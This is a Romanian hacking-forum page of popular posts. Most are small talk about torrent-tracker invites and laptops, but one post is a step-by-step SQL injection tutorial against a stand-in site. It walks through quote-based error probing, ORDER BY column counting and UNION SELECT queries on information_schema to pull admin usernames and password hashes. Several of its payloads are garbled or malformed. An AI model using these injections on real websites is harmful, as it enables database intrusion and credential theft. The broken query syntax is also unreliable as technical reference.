Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/06/19 in all areas

  1. Le multumesc baietilor insa FileList am. As dori IpTorrents. Multumesc!
    1 point
  2. Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.
    1 point
  3. Mamaaa, asta m-a invatat pe mine cineva (tot de aici insa nu mai retin nick-ul) acum 5-6 ani cred :-)) (era pe timpul cu rstcenter...) Foarte bun tutorial. O sa caut in pc-ul meu ca aveam ceva syntaxe cu sqli, si le postez tot aici.
    1 point
  4. da ce lenovo ai ? eu am thinkpad si cred ca este cel mai bun
    1 point
×
×
  • Create New...